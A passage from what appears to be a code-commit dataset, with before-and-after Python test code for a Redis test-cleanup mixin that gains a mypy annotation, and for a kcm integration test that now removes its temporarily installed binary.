if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
<commit_before>class RedisCleanupMixin(object):
client = None
prefix = None
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
<commit_msg>Add annotation required for mypy<commit_after>
|
class RedisCleanupMixin(object):
client = None
prefix = NotImplemented # type: str
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
class RedisCleanupMixin(object):
client = None
prefix = None
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
Add annotation required for mypyclass RedisCleanupMixin(object):
client = None
prefix = NotImplemented # type: str
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
<commit_before>class RedisCleanupMixin(object):
client = None
prefix = None
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
<commit_msg>Add annotation required for mypy<commit_after>class RedisCleanupMixin(object):
client = None
prefix = NotImplemented # type: str
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
e281c9ab30acdbc60439a143557efdeaf4757e1b
|
tests/integration/test_kcm_install.py
|
tests/integration/test_kcm_install.py
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
integration.execute("rm", [installed_kcm])
|
Remove the installed kcm binary after int tests.
|
Remove the installed kcm binary after int tests.
|
Python
|
apache-2.0
|
Intel-Corp/CPU-Manager-for-Kubernetes,Intel-Corp/CPU-Manager-for-Kubernetes,Intel-Corp/CPU-Manager-for-Kubernetes
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
Remove the installed kcm binary after int tests.
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
integration.execute("rm", [installed_kcm])
|
<commit_before>from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
<commit_msg>Remove the installed kcm binary after int tests.<commit_after>
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
integration.execute("rm", [installed_kcm])
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
Remove the installed kcm binary after int tests.from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
integration.execute("rm", [installed_kcm])
|
<commit_before>from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
<commit_msg>Remove the installed kcm binary after int tests.<commit_after>from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
integration.execute("rm", [installed_kcm])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.